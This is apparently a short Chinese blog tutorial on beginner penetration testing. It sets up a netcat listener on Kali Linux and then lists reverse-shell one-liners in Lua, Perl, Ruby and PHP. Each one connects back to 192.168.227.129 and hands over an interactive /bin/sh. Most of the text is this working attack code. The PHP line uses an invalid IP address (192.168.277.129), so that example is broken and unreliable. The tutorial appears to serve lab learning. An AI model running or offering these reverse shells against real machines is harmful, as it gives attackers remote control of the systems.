渗透测试首先要搞定虚拟机和环境问题,虚拟机就不在赘述,网上很多,我也写过,环境的查看方法是win+R,呼出指令面板,输入cmd,打开命令提示符。
输入各种环境查询,如果没有,就像这样。
如果有,就像这样
然后就可以执行各种测试
具体的实验建议分别在一台kali Linux 和一台 C/Linux上做,最好用远程监听工具
我推荐这款 无网络,不实验哦
在kali Linux上监听端口命令:nc -lvvp 1111
(端口自己随便改,有不冲突就行)
就像这样
然后在C/Linux上输入各种代码
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.227.129','1111');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:
反馈:
perl -e '
use Socket;
$i="192.168.227.129";
$p=1111;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.227.129","1111");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
php -r '$sock=fsockopen("192.168.277.129",1111);exec("/bin/bash -i <&3 >&3 2>&3");'
诸如此类,反馈也不尽相同
链接成功,这就是初步的渗透测试。